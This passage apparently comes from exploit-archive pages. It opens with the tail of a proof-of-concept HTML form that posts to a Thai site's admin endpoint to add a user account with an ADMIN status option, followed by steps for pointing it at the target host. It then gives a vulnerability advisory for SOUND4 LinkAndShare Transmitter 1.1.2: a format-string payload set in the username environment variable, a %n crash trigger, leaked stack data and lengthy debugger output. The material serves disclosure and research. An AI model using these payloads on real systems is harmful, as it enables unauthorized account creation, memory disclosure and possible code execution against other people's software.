/> if(confirm(' ยืนยันการลบ ใช่ หรือ ไม่? !!! ')){<br /> return true; // ถ้าตกลง OK โปรแกรมก็จะทำงานต่อไป <br /> }else{<br /> return false; // ถ้าตอบ Cancel ก็คือไม่ต้องทำอะไร <br /> }<br /> }<br /></script><br /><!-- จบ --><br /><link rel="stylesheet" href="http://haji-zowzow.com/admin/color_plugin/css/colorpicker.css" type="text/css" /><br /> <script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/jquery.js"></script><br /> <script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/colorpicker.js"></script><br /> <script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/eye.js"></script><br /> <script type="text/javascript" src="http://haji-zowzow.com/admin/color_plugin/js/layout.js?ver=1.0.2"></script><br /> <br /><script src="http://haji-zowzow.com/admin/menu/js/jquery-latest.min.js" type="text/javascript"></script><br /><body><br /><div class="sub_head">+++ จัดการ User</div><br /><br /><a href="?Action=plus"><br /><div class="fab red"><br /> <core-icon icon="add"></core-icon><br /> <paper-ripple class="circle recenteringTouch" fit></paper-ripple><br /></div><br /></a><br /><a href="http://haji-zowzow.com/admin/user/user.php?Action=show"><br /><div class="fab blue"><br /> <core-icon icon="menu"></core-icon><br /> <paper-ripple class="circle recenteringTouch" fit></paper-ripple><br /></div><br /></a> <br /><br /><br /><br /><div class="dialog" style="width:600px; height:auto;"><br /><form action="http://haji-zowzow.com/admin/user/user.php?Action=add" role="form" method="post" enctype='multipart/form-data'><br /><br /> <div class="form-group"><br /> <input type="text" class="form-control" id="exampleInputEmail1" name="user" required><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color: #09F;">*Username (รหัสผู้ใช้)</label><br /> </div><br /> <br /> <div class="form-group"><br /> <input type="text" 
class="form-control" id="exampleInputEmail1" name="pass" required><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color: #09F;">*Password (รหัสผ่าน)</label><br /> </div><br /> <br /> <br /> <br /> <div class="form-group"><br /> <input type="text" class="form-control" name="name"><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Name (ชื่อ-สกุล)</label><br /> </div><br /> <br /> <div class="form-group"><br /> <input type="text" class="form-control" name="tel"><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Telephone (เบอร์โทรศัพท์)</label><br /> </div><br /> <br /> <div class="form-group"><br /> <input type="text" class="form-control" name="email"><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*E-mail (อีเมล์)</label><br /> </div><br /> <br /> <div class="form-group"><br /> <textarea name="address" style="height:100px; padding:5px;" class="form-control"></textarea><br /> <span class="form-highlight"></span><br /> <span class="form-bar"></span><br /> <label class="float-label" for="exampleInputEmail1" style="color:#09F; font-size:20px;">*Address (ที่อยู่)</label><br /> </div><br /> <br /> <div class="form-group"> <br /> <input class="form-control" type="file" id="exampleInputFile" name="filUpload" style="visibility:hidden;"><br /> <label for="exampleInputFile" class="button_m raised blue" style="font-size:20px; padding-left:10px; width:300px; ">Image Profile (เลือกรูปโปรไฟล์ ขนาด 200x200)</label><br /> </div><br /> <br /> <div class="zero-clipboard"><span class="btn-clipboard with-example" 
style="font-size:18px; color:#09F;">Status (สถานะ)</span></div><div class="bs-example"><br /> <br /> <select class="form-control" name="Status"><br /> <option value="USER">USER</option><br /> <option value="ADMIN">ADMIN</option><br /> </select><br /><br /> </div><br /><br /> <input type="submit" value="บันทึก" class="button_m raised green" style="border:none; font-family:Conv_thaisanslite_r1;"/><br /> <br /></form> <br /><br /></body><br /></html><br /><br />[+] Go to line 46 of the file (presumably the form's action URL, the only link the POST actually goes to).<br /><br />[+] Replace the target site link there with the host you are testing, save the changes and apply.<br /><br />Greetings to :===================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet| <br />==================================================================================================<br /></code></pre>
<pre><code><br />SOUND4 LinkAndShare Transmitter 1.1.2 Format String Stack Buffer Overflow<br /><br /><br />Vendor: SOUND4 Ltd.<br />Product web page: https://www.sound4.com | https://www.sound4.biz<br />Affected version: 1.1.2<br /><br />Summary: The SOUND4 Link&Share (L&S) is a simple and open protocol that<br />allows users to remotely control SOUND4 processors through a network connection.<br />SOUND4 offers a tool that manages sending L&S commands to your processors:<br />the Link&Share Transmitter.<br /><br />Desc: The application suffers from a format string memory leak and stack<br />buffer overflow vulnerability because it fails to properly sanitize user<br />supplied input read from the environment via the getenv() function in<br />MSVCR120.DLL and passes it on as the format string of a printf-family call<br />(the crash stack below runs from the application through _vsnprintf and<br />_output_l). Conversion specifiers such as %p and %x leak stack contents into<br />the log output, while %n reaches the CRT invalid-parameter handler and<br />terminates the process with fail-fast status 0xC0000409, subcode<br />FAST_FAIL_INVALID_ARG; note that "Security check failure or stack buffer<br />overrun" is the generic description of that status, so the %n crash alone<br />is not proof of an actual overrun. The attacker can abuse the username<br />environment variable to trigger the bug and potentially execute code on the<br />affected system.<br /><br />---------------------------------------------------------------------------<br />(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! 
second chance !!!)<br />eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000<br />eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />MSVCR120!_invoke_watson+0xe:<br />645046b1 cd29 int 29h<br />---------------------------------------------------------------------------<br /><br />Tested on: Microsoft Windows 10 Home<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5744<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5744.php<br /><br /><br />26.09.2022<br /><br />--<br /><br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe<br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:06:19 : : Internal Error: can not replace file with temp file<br />02/02/23 17:06:19 : Background launch: User: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd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fc0e0012ffac867ef2b40867f0bf8167f0bfbcc25352e4e776c4eb0deca73012ffac8776bac49512ffac412ffb0c1399fe812ffad432ec2b6a512ffafc67eef8c70012ffb0c67eef8d612ffb0c67eef90b013872ca12ffb1c67f0e537013872ca139c3e0139eda81399fe8eb1b0112ffb3467f0e5849094dec12ffb74ec89edeb0000013872cba9094db0ec88beec88be11ae0000013872cb12ffb40012ffbd0ec8ae98cba554012ffb8476f700f911ae00076f700e012ffbe0776c7bbe11ae00032ec2a320011ae000000000000012ffb90012ffbe8776dae6044b51d72012ffbf0776c7b8effffffff776e8d1d00ec88be11ae000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br /><br /><br />---<br /><br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%n<br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe<br /><br />(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)<br />eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000<br />eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />MSVCR120!_invoke_watson+0xe:<br />645046b1 cd29 int 29h<br />0:000> kb<br /> # ChildEBP RetAddr Args to Child <br />00 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] <br />01 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 85] <br />02 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 96] <br />03 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 [f:\dd\vctools\crt\crtw32\stdio\output.c @ 1690] <br />04 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 138] <br />*** WARNING: Unable to verify checksum for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe<br />*** ERROR: Module load completed but symbols could not be loaded for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe<br />05 
0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 190] <br />WARNING: Stack unwind information not available. Following frames may be wrong.<br />06 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11<br />07 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f<br />08 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58<br />09 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed<br />0a 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19<br />0b 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f<br />0c 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b<br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />GetUrlPageData2 (WinHttp) failed: 12002.<br />DUMP_CLASS: 2<br />DUMP_QUALIFIER: 0<br />FAULTING_IP: <br />MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]<br />645046b1 cd29 int 29h<br /><br />EXCEPTION_RECORD: (.exr -1)<br />ExceptionAddress: 645046b1 (MSVCR120!_invoke_watson+0x0000000e)<br /> ExceptionCode: c0000409 (Security check failure or stack buffer overrun)<br /> ExceptionFlags: 00000001<br />NumberParameters: 1<br /> Parameter[0]: 00000005<br />Subcode: 0x5 FAST_FAIL_INVALID_ARG<br /><br />FAULTING_THREAD: 000059e8<br />DEFAULT_BUCKET_ID: FAIL_FAST_INVALID_ARG<br />PROCESS_NAME: LinkAndShareTransmitter.exe<br />ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. 
This overrun could potentially allow a malicious user to gain control of this application.<br />EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.<br />EXCEPTION_CODE_STR: c0000409<br />EXCEPTION_PARAMETER1: 00000005<br />WATSON_BKT_PROCSTAMP: 6144495e<br />WATSON_BKT_PROCVER: 1.1.0.2<br />PROCESS_VER_PRODUCT: Sound4 Link&Share Transmitter<br />WATSON_BKT_MODULE: MSVCR120.dll<br />WATSON_BKT_MODSTAMP: 577e0f1e<br />WATSON_BKT_MODOFFSET: a46b1<br />WATSON_BKT_MODVER: 12.0.40660.0<br />MODULE_VER_PRODUCT: Microsoft® Visual Studio® 2013<br />BUILD_VERSION_STRING: 10.0.19041.2364 (WinBuild.160101.0800)<br />MODLIST_WITH_TSCHKSUM_HASH: 938db164a2b944fa7c2a5efef0c4e9b0f4b8e3d5<br />MODLIST_SHA1_HASH: 5990094944fb37a3f4c159affa51a53b6a58ac20<br />NTGLOBALFLAG: 70<br />APPLICATION_VERIFIER_FLAGS: 0<br />PRODUCT_TYPE: 1<br />SUITE_MASK: 784<br />DUMP_TYPE: fe<br />ANALYSIS_SESSION_HOST: LAB17<br />ANALYSIS_SESSION_TIME: 01-29-2023 16:09:48.0143<br />ANALYSIS_VERSION: 10.0.16299.91 x86fre<br />THREAD_ATTRIBUTES: <br />OS_LOCALE: ENU<br /><br />PROBLEM_CLASSES: <br /><br /> ID: [0n270]<br /> Type: [FAIL_FAST]<br /> Class: Primary<br /> Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)<br /> BUCKET_ID<br /> Name: Add<br /> Data: Omit<br /> PID: [Unspecified]<br /> TID: [Unspecified]<br /> Frame: [0]<br /><br /> ID: [0n257]<br /> Type: [INVALID_ARG]<br /> Class: Addendum<br /> Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)<br /> BUCKET_ID<br /> Name: Add<br /> Data: Omit<br /> PID: [Unspecified]<br /> TID: [Unspecified]<br /> Frame: [0]<br /><br />BUGCHECK_STR: FAIL_FAST_INVALID_ARG<br />PRIMARY_PROBLEM_CLASS: FAIL_FAST<br />LAST_CONTROL_TRANSFER: from 64504677 to 645046b1<br /><br />STACK_TEXT: <br />0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe<br />0119f0d0 64504684 00000000 00000000 
00000000 MSVCR120!_invalid_parameter+0x2a<br />0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc<br />0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49<br />0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81<br />0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16<br />WARNING: Stack unwind information not available. Following frames may be wrong.<br />0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11<br />0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f<br />0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58<br />0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed<br />0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19<br />0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f<br />0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b<br /><br />STACK_COMMAND: ~0s ; .cxr ; kb<br />THREAD_SHA1_HASH_MOD_FUNC: 0b8f8316052b30cae637e16edbb425a676500e95<br />THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 359d5607a5627480201647a1bc659e9d2ac9281f<br />THREAD_SHA1_HASH_MOD: 2418d74468f3882fef267f455cd32d7651645882<br /><br />FOLLOWUP_IP: <br />MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]<br />645046b1 cd29 int 29h<br /><br />FAULT_INSTR_CODE: 6a5629cd<br />FAULTING_SOURCE_LINE: f:\dd\vctools\crt\crtw32\misc\invarg.c<br />FAULTING_SOURCE_FILE: f:\dd\vctools\crt\crtw32\misc\invarg.c<br />FAULTING_SOURCE_LINE_NUMBER: 132<br />SYMBOL_STACK_INDEX: 0<br />SYMBOL_NAME: MSVCR120!_invoke_watson+e<br />FOLLOWUP_NAME: MachineOwner<br />MODULE_NAME: MSVCR120<br />IMAGE_NAME: MSVCR120.dll<br />DEBUG_FLR_IMAGE_TIMESTAMP: 577e0f1e<br />BUCKET_ID: FAIL_FAST_INVALID_ARG_MSVCR120!_invoke_watson+e<br />FAILURE_EXCEPTION_CODE: c0000409<br />FAILURE_IMAGE_NAME: MSVCR120.dll<br />BUCKET_ID_IMAGE_STR: MSVCR120.dll<br 
/>FAILURE_MODULE_NAME: MSVCR120<br />BUCKET_ID_MODULE_STR: MSVCR120<br />FAILURE_FUNCTION_NAME: _invoke_watson<br />BUCKET_ID_FUNCTION_STR: _invoke_watson<br />BUCKET_ID_OFFSET: e<br />BUCKET_ID_MODTIMEDATESTAMP: 577e0f1e<br />BUCKET_ID_MODCHECKSUM: f8aef<br />BUCKET_ID_MODVER_STR: 12.0.40660.0<br />BUCKET_ID_PREFIX_STR: FAIL_FAST_INVALID_ARG_<br />FAILURE_PROBLEM_CLASS: FAIL_FAST<br />FAILURE_SYMBOL_NAME: MSVCR120.dll!_invoke_watson<br />FAILURE_BUCKET_ID: FAIL_FAST_INVALID_ARG_c0000409_MSVCR120.dll!_invoke_watson<br />WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/LinkAndShareTransmitter.exe/1.1.0.2/6144495e/MSVCR120.dll/12.0.40660.0/577e0f1e/c0000409/000a46b1.htm?Retriage=1<br />TARGET_TIME: 2023-01-29T15:09:52.000Z<br />OSBUILD: 19044<br />OSSERVICEPACK: 2364<br />SERVICEPACK_NUMBER: 0<br />OS_REVISION: 0<br />OSPLATFORM_TYPE: x86<br />OSNAME: Windows 10<br />OSEDITION: Windows 10 WinNt SingleUserTS Personal<br />USER_LCID: 0<br />OSBUILD_TIMESTAMP: 2008-01-07 11:33:18<br />BUILDDATESTAMP_STR: 160101.0800<br />BUILDLAB_STR: WinBuild<br />BUILDOSVER_STR: 10.0.19041.2364<br />ANALYSIS_SESSION_ELAPSED_TIME: 635d<br />ANALYSIS_SOURCE: UM<br />FAILURE_ID_HASH_STRING: um:fail_fast_invalid_arg_c0000409_msvcr120.dll!_invoke_watson<br />FAILURE_ID_HASH: {c9fee478-4ed1-0d2b-ddd7-dca655d9817f}<br /><br />Followup: MachineOwner<br />---------<br /><br />0:000> d MSVCP120<br />70fb0000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ..............<br />70fb0010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@.......<br />70fb0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<br />70fb0030 00 00 00 00 00 00 00 00-00 00 00 00 f8 00 00 00 ................<br />70fb0040 0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68 ........!..L.!Th<br />70fb0050 69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f is program canno<br />70fb0060 74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20 t be run in DOS <br />70fb0070 6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 
00 00 00 00 mode....$.......<br />0:000> lmvm MSVCR120<br />Browse full module list<br />start end module name<br />64460000 6454e000 MSVCR120 (private pdb symbols) C:\ProgramData\dbg\sym\msvcr120.i386.pdb\4D11E607E50346DDAB0C2C4FFC8716112\msvcr120.i386.pdb<br /> Loaded symbol image file: C:\WINDOWS\SYSTEM32\MSVCR120.dll<br /> Image path: C:\WINDOWS\SysWOW64\MSVCR120.dll<br /> Image name: MSVCR120.dll<br /> Browse all global symbols functions data<br /> Timestamp: Thu Jul 7 10:13:18 2016 (577E0F1E)<br /> CheckSum: 000F8AEF<br /> ImageSize: 000EE000<br /> File version: 12.0.40660.0<br /> Product version: 12.0.40660.0<br /> File flags: 0 (Mask 3F)<br /> File OS: 4 Unknown Win32<br /> File type: 2.0 Dll<br /> File date: 00000000.00000000<br /> Translations: 0409.04b0<br /> CompanyName: Microsoft Corporation<br /> ProductName: Microsoft® Visual Studio® 2013<br /> InternalName: msvcr120.dll<br /> OriginalFilename: msvcr120.dll<br /> ProductVersion: 12.00.40660.0<br /> FileVersion: 12.00.40660.0 built by: VSULDR<br /> FileDescription: Microsoft® C Runtime Library<br /> LegalCopyright: © Microsoft Corporation. 
All rights reserved.<br />0:000> x /D /f MSVCR120!getenv<br /> MSVCR120!getenv (char *)<br />0:000> x /D /f MSVCR120!getenv<br />64477785 MSVCR120!getenv (char *)<br />..<br />0:000> u 64477785<br />MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]:<br />64477785 6a0c push 0Ch<br />64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0)<br />6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b)<br />64477791 8365e400 and dword ptr [ebp-1Ch],0<br />64477795 33c0 xor eax,eax<br />64477797 8b7508 mov esi,dword ptr [ebp+8]<br />6447779a 85f6 test esi,esi<br />6447779c 0f95c0 setne al<br />0:000> r<br />eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000<br />eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc<br 